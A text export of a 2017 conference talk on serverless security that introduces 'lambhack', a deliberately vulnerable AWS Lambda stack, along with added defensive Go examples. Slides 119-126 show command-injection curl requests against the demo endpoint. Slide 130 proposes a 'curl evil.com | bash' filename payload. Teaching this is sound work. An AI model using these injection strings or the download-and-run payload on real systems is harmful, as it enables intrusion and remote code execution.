1. LASCON 2017 @WICKETT
SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS
JAMES WICKETT
2. Don't worry, this is not a thinly veiled vendor pitch.
3. WANT THE SLIDES RIGHT NOW? Send an email to [email protected]
4. JAMES WICKETT
HEAD OF RESEARCH AT SIGNAL SCIENCES
DEVOPS DAYS AUSTIN ORGANIZER
AUTHOR, DEVOPS FUNDAMENTALS AT LYNDA.COM
BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
5. CONCLUSION (1 OF 2)
SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
NEW SERVERLESS PATTERNS ARE JUST EMERGING
SECURITY WITH SERVERLESS IS EASIER
SECURITY WITH SERVERLESS IS HARDER
6. CONCLUSION (2 OF 2)
FOUR KEY AREAS APPLY TO SERVERLESS SECURITY: SOFTWARE SUPPLY CHAIN SECURITY, DELIVERY PIPELINE SECURITY, DATA FLOW SECURITY, ATTACK DETECTION
LAMBHACK! A VERY VULNERABLE LAMBDA STACK, OPEN SOURCE PROJECT: GITHUB.COM/WICKETT/LAMBHACK
7. WHAT IS SERVERLESS?
8. MISCONCEPTIONS
9. IT'S MARKETING (CLOUD REBRANDED)
10. SERVERLESS == NO SERVERS
11. SERVERLESS == BACKEND AS A SERVICE
12. SERVERLESS == PLATFORM AS A SERVICE
17. HISTORY OF SERVERLESS
2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES
LATE 2014 - AWS LAUNCHED LAMBDA
JULY 2015 - AWS LAUNCHED API GATEWAY
OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA
2015 TO PRESENT - FRAMEWORKS FORMING
2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
2016 - SERVERLESS CONFERENCES STARTED
18. (Chart comparing Hardware, VMs and Serverless in terms of Waste and Value.) Inspiration from @adrianco
20. WHAT CAN WE SAY IS SERVERLESS?
21. SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)
22. CONTAINERS ON DEMAND
23. SERVERLESS IS (NO MANAGEMENT OF) SERVERS
24. SERVERLESS IS SERVICEFULL
25. SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS
26. "If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." - @Cloudopinion https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
27. THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS
28. SERVERLESS WILL COMPLETELY DISRUPT THE CONTAINER MARKET IN ONE, MAYBE TWO YEARS.
29. SERVERLESS DEFINITION
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
30. SO, WHAT ARE THE UPSIDES?
31. SCALING BUILT IN
32. PAY FOR WHAT YOU USE IN 100MS INCREMENTS
33. WITH SERVERLESS, SYSTEM ADMINISTRATION IS (MOSTLY) LOWER
34. SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS
35. YOU CAN SKIP DOCKERING ALL THE THINGS!
36. GREAT, WHAT'S THE CATCH?
37. "Ops burden to rationalize serverless model" - @patrickdebois
45. SERVERLESS DEAL KILLERS (MAYBE?)
APP NEEDS LARGE LOCAL DISK SPACE
LONG RUNNING JOBS
BIG I/O TASKS
LATENCY SENSITIVE REQUESTS THAT CAN'T WAIT FOR THE COLD-STARTUP TIME
48. API GATEWAY (source: http://martinfowler.com/articles/serverless.html)
49. WEB APPLICATIONS
50. MORE SERVERLESS USE CASES: CI/CD, auth, wordpress scraper, event ingestion, chatbots, load testing
51. Security
52. LET'S TRY A SAMPLE APPLICATION IN AWS
53. STEP 1: PICK A FRAMEWORK (SERVERLESS, APEX, GO SPARTA, KAPPA)
55. GO SPARTA
GOLANG! AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
56. GO SPARTA INCLUDES: CLOUDWATCH EVENTS AND LOGS; DYNAMODB, KINESIS, S3; SES, SNS; API GATEWAY CREATION
57. STEP 2: IDEA!
BUILD A WORD CLOUD GENERATOR
ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES
RETURN JSON WITH COUNTS OF WORDS IN TEXT
KEEP IT SIMPLE
58. STEP 3: DESIGN AND ARCHITECTURE (USING GO SPARTA FOR THE FRAMEWORK): LAMBDA, S3, API GATEWAY
60. STEP 4: WRITE THE HANDLER
61. STEP 5: SETUP API GATEWAY
62. STEP 6: SET THE CONFIG DETAILS
63. STEP 7: PROVISION YOUR APP!
64. STEP 8: SETUP STRICT IAM POLICIES
65. STEP 9: GIVE UP AND SET VERY BAD IAM POLICIES, PROMISE TO FIX LATER
66. STEP 10: PROVISION YOUR APP!
67. APP IN AWS CONSOLE
68. TEST LAMBDA EXEC IN CONSOLE: FIRST RUN OF 343MS
69. SECOND RUN ONLY TOOK 84MS
70. API GATEWAY IN CONSOLE
71. API GATEWAY EXECUTION IN CONSOLE
72. RETURNED JSON
73. MONITORING LAMBDA IN CONSOLE
74. OVERALL SERVERLESS EXPERIENCE
YOU NEED A FRAMEWORK OR YOU DIE.
WHY IS IAM SO HAAARRDD?
WOW! I HAVE A FULLY ELASTIC, FAST API RUNNING ON THE INTERNET FOR BASICALLY NO COST. THIS IS GOING TO BE HUGE!
75. IS SECURITY READY FOR SERVERLESS?
77. SECURITY
78. "many security teams work with a worldview where their goal is to inhibit change as much as possible"
79. OLD PATH VS. NEW PATH
Embrace Secrecy -> Create Feedback Loops
Just Pass Audit! -> Compliance adds Value
Enforce Stability -> Create Chaos
Build a Wall -> Zero Trust Networks
Slow Validation -> Fast and Non-blocking
Certainty Testing -> Adversity Testing
Test when Done -> Shift Left
Process Driven -> The Paved Road
81. FOUR AREAS OF SERVERLESS SECURITY: SECURE SOFTWARE SUPPLY CHAIN, DELIVERY PIPELINE, DATA FLOW SECURITY, ATTACK DETECTION
82. source: @devsecops
83. SURFACE AREA REDUCTION
THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW
CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE
84. SURFACE AREA EXPANSION
TLS CONTROL TO THE PROVIDER
ROUTING CONTROL TO THE PROVIDER
CONSUMPTION OF THIRD PARTY SERVICES
IAM ROLES AND POLICY CONFUSION
85. SSL / TLS FROM THE PROVIDER
86. OLD WAY VS. NEW WAY
87. ROUTING FROM THE PROVIDER
88. ROUTING THE OLD WAY
89. ROUTING THE NEW WAY
90. SERVICE AND 3RD PARTY EXPANSION: Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0
91. IAM ROLES AND POLICIES (https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds)
92. Recommendation: Use a third-party service to monitor for provider config changes
93. USE GOOD HYGIENE WITH YOUR PROVIDER
DISABLE ROOT ACCESS KEYS
MANAGE USERS WITH PROFILES
SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
SECURE KEYS IN DEV SYSTEM
USE PROVIDER MFA
97. EASIER TO MOCK VS. HARDER TO MOCK
98. UNIT TESTING EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER
99. INTEGRATION TESTING
USE OF A STAGING OR PRE-PROD ENV
END TO END SYNTHETIC INTEGRATION TESTS
ALL THE USUAL SUSPECTS
100. CONFIGURATION IS PART OF DELIVERY
101. GOOD PIPELINE PRACTICES
ONLY DEV KEYS CAN PUSH TO DEV
ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-PROD
INTEGRATION TESTS MUST PASS IN THIS ENV
SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION
ALLOW PUSH TO PROD ONLY BY DEPLOY SYSTEM
103. GAUNTLT WORKSHOP IN 9 EXAMPLES: http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
104. DATA FLOW
DEVELOPMENT: DATA FLOW DIAGRAMS, THREAT MODELING
RUNTIME: LOGGING, CUSTOM MONITORS/METRICS
105. "Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner." https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
106. DATA FLOW SECURITY
SPOOFING
CONSUMED RESOURCES
DENIAL OF SERVICE
TIMEOUTS
EXECUTION RESTRICTIONS FOR RESOURCES
CAPACITY ISSUES
107. ATTACK DETECTION
108. DOES APPLICATION SECURITY STILL MATTER?
111. APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!
112. INSPIRED BY ALL THE GOATS
114. INTRODUCING LAMBHACK
SERVERLESS HAS A FALSE SENSE OF SECURITY: "API PROXY LAYER THING PROTECTS ME, RIGHT?" ;)
WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
A VULNERABLE LAMBDA + API GATEWAY STACK
BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS
116. A VULNERABLE LAMBDA + API GATEWAY STACK
OPEN SOURCE, MIT LICENSED
INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
GITHUB.COM/WICKETT/LAMBHACK
117. "lambhack is a vulnerable serverless lambda application. It would certainly be a bad idea to base any coding patterns off what you see here."
119. WHY IS THIS BAD?
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
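The two lines on slide 119 take the raw "args" query string value and hand it to a shell runner, so every shell metacharacter in the request is interpreted. As an added example (not lambhack code and not the Go Sparta API), here is the shape of a handler that keeps a subprocess but closes the injection: the query parameter selects an entry in a fixed allowlist, and the resulting argv is executed directly with os/exec rather than through a shell. The HandleRequest signature and the queryParams map are assumptions standing in for whatever the framework actually provides.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
)

// The lambhack pattern from the slide (vulnerable):
//
//	command := lambdaEvent.QueryParams["args"]
//	output := runner.Run(command)
//
// Below, "args" names an operation instead of being a command line.

// ErrNotAllowed is returned for any "args" value outside the allowlist.
var ErrNotAllowed = errors.New("operation not allowed")

// allowlist maps an operation name to a fixed argv. Nothing from the request
// is ever interpolated into these vectors.
var allowlist = map[string][]string{
	"kernel": {"uname", "-r"},
	"disk":   {"df", "-h", "/tmp"},
}

// ResolveCommand validates the untrusted "args" value against the allowlist
// and returns a copy of the fixed argv, or ErrNotAllowed. A value such as
// "uname -a; sleep 1" is simply not a key, so it is rejected before anything
// runs.
func ResolveCommand(args string) ([]string, error) {
	argv, ok := allowlist[args]
	if !ok {
		return nil, fmt.Errorf("%w: %q", ErrNotAllowed, args)
	}
	out := make([]string, len(argv))
	copy(out, argv)
	return out, nil
}

// HandleRequest is the hardened handler. queryParams stands in for the
// framework's parsed query string (an assumption about its shape).
func HandleRequest(queryParams map[string]string) (string, error) {
	argv, err := ResolveCommand(queryParams["args"])
	if err != nil {
		return "", err
	}
	// exec.Command runs the binary directly: no /bin/sh is involved, so ';',
	// '|' and '$(...)' in the request can never reach a shell.
	output, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	if err != nil {
		return "", fmt.Errorf("running %v: %w", argv, err)
	}
	return string(output), nil
}

func main() {
	for _, args := range []string{"kernel", "uname -a; sleep 1"} {
		out, err := HandleRequest(map[string]string{"args": args})
		fmt.Printf("args=%q err=%v out=%q\n", args, err, out)
	}
}
```

If the function does not actually need to spawn anything (the word cloud service in this deck does not), the right fix is to delete the subprocess path entirely; the allowlist is for the case where a fixed set of helper binaries genuinely has to run.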
120. With command execution available to us in lambhack, we can poke around the container a bit
121. UNAME -A
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
122. CAT /PROC/VERSION
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
123. LET'S LOOK IN /TMP
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
-rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
126. GOT PROXY?
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1"
> (the HTML of the www.example.com landing page, returned as a JSON-escaped string; the slide export dropped the tags and the backslashes of the \n escapes, leaving only the text: "Example Domain ... This domain is established to be used for illustrative examples in documents. You may use this domain in examples without prior coordination or asking for permission. More information...")
127. FUTURE OF LAMBHACK
HELP NEEDED
ADD XSS AND OTHER ATTACKS
ADD AUTH VECTORS AND EXAMPLES
NEEDS A UI PLEASE!
PULL REQUESTS ACCEPTED :)
128. APPSEC THOUGHTS
LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
MONITORING/LOGGING PLAYS A KEY ROLE HERE
DETECT LONGER RUN TIMES
HIGHER ERROR RATE OCCURRENCES
DATA INGESTION
LOG ACTIONS OF LAMBDAS
129. APPLICATION SECURITY IS STILL RELEVANT
130. TYPES OF ATTACKS
New surface area, similar appsec problems
Command Exec
XSS
Injection Attacks
Try new things, e.g. appending curl evil.com | bash or alert(1) to a filename you upload on s3
131. DEFENSE
LOGGING, EMITTING EVENTS
USAGE METRICS
VANDIUM (SQLI) WRAPPER
CONTENT SECURITY POLICY (CSP)
API GATEWAYS ARE A GOOD PLACE TO ADD DEFENSE
MORE THINGS NEED TO BE DONE HERE
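Slide 128 asks for detection of longer run times and higher error rates, and slide 131 lists logging and usage metrics as the defence. The Go program below is an added example written for this page, not part of the talk, showing what that looks like against the REPORT line Lambda writes to CloudWatch after every invocation. The log excerpt is constructed: request ids and the timeout line are made up, and the REPORT fields are space-separated here where real CloudWatch output uses tabs (the pattern accepts either). The 500 ms threshold is chosen from the deck's own numbers: a warm run took 84 ms, so the "+sleep+1" invocations from the lambhack slides stand out by an order of magnitude.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Constructed CloudWatch log excerpt for one function. Lambda writes a REPORT
// line after every invocation and a "Task timed out" line before the REPORT
// of an invocation that hit its timeout. Values here are invented.
const SampleLogs = `REPORT RequestId: req-0001 Duration: 84.12 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
REPORT RequestId: req-0002 Duration: 91.55 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB
REPORT RequestId: req-0003 Duration: 1088.40 ms Billed Duration: 1100 ms Memory Size: 128 MB Max Memory Used: 33 MB
2017-10-19T20:00:03Z req-0004 Task timed out after 3.00 seconds
REPORT RequestId: req-0004 Duration: 3003.21 ms Billed Duration: 3000 ms Memory Size: 128 MB Max Memory Used: 34 MB
REPORT RequestId: req-0005 Duration: 79.90 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 31 MB`

// Invocation is what we keep per REPORT line.
type Invocation struct {
	RequestID  string
	DurationMs float64
	BilledMs   int
	TimedOut   bool
}

// reportRe matches the leading fields of a REPORT line; \s+ accepts the tabs
// real CloudWatch output uses as well as the spaces in SampleLogs.
var reportRe = regexp.MustCompile(`^REPORT RequestId: (\S+)\s+Duration: ([\d.]+) ms\s+Billed Duration: (\d+) ms`)

// ParseInvocations builds one Invocation per REPORT line. The request id of a
// "Task timed out" line is its second whitespace-separated field; it is
// remembered so the matching REPORT can be marked.
func ParseInvocations(logs string) []Invocation {
	timedOut := map[string]bool{}
	var out []Invocation
	for _, line := range strings.Split(logs, "\n") {
		if m := reportRe.FindStringSubmatch(line); m != nil {
			d, _ := strconv.ParseFloat(m[2], 64)
			b, _ := strconv.Atoi(m[3])
			out = append(out, Invocation{RequestID: m[1], DurationMs: d, BilledMs: b, TimedOut: timedOut[m[1]]})
			continue
		}
		if strings.Contains(line, "Task timed out") {
			if f := strings.Fields(line); len(f) >= 2 {
				timedOut[f[1]] = true
			}
		}
	}
	return out
}

// Finding is one alert-worthy observation.
type Finding struct {
	RequestID string
	Reason    string
}

// Detect flags every invocation that ran longer than maxMs and every timeout,
// and returns the timeout rate over the window so a rising error rate can be
// alerted on separately from individual slow runs.
func Detect(invs []Invocation, maxMs float64) ([]Finding, float64) {
	var findings []Finding
	errors := 0
	for _, inv := range invs {
		if inv.DurationMs > maxMs {
			findings = append(findings, Finding{inv.RequestID,
				fmt.Sprintf("duration %.0f ms exceeds %.0f ms", inv.DurationMs, maxMs)})
		}
		if inv.TimedOut {
			errors++
			findings = append(findings, Finding{inv.RequestID, "task timed out"})
		}
	}
	rate := 0.0
	if len(invs) > 0 {
		rate = float64(errors) / float64(len(invs))
	}
	return findings, rate
}

func main() {
	invs := ParseInvocations(SampleLogs)
	findings, rate := Detect(invs, 500)
	for _, f := range findings {
		fmt.Printf("%s: %s\n", f.RequestID, f.Reason)
	}
	fmt.Printf("error rate over window: %.0f%%\n", rate*100)
}
```

The same loop can feed a metric filter or a custom CloudWatch metric instead of printing; the point is that duration and timeout data already exist for every invocation, so "detect longer run times" costs nothing beyond reading the log stream the function already writes.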
132. FINAL THOUGHT
Development in serverless is easier than ever, attracting new developers to web development; as a result, application security will see a rise.
134. CONCLUSION (1 OF 2)
SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
NEW SERVERLESS PATTERNS ARE JUST EMERGING
SECURITY WITH SERVERLESS IS EASIER
SECURITY WITH SERVERLESS IS HARDER
135. CONCLUSION (2 OF 2)
FOUR KEY AREAS APPLY TO SERVERLESS SECURITY: SOFTWARE SUPPLY CHAIN SECURITY, DELIVERY PIPELINE SECURITY, DATA FLOW SECURITY, ATTACK DETECTION
LAMBHACK! A VERY VULNERABLE LAMBDA STACK, OPEN SOURCE PROJECT: GITHUB.COM/WICKETT/LAMBHACK
136. WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to [email protected]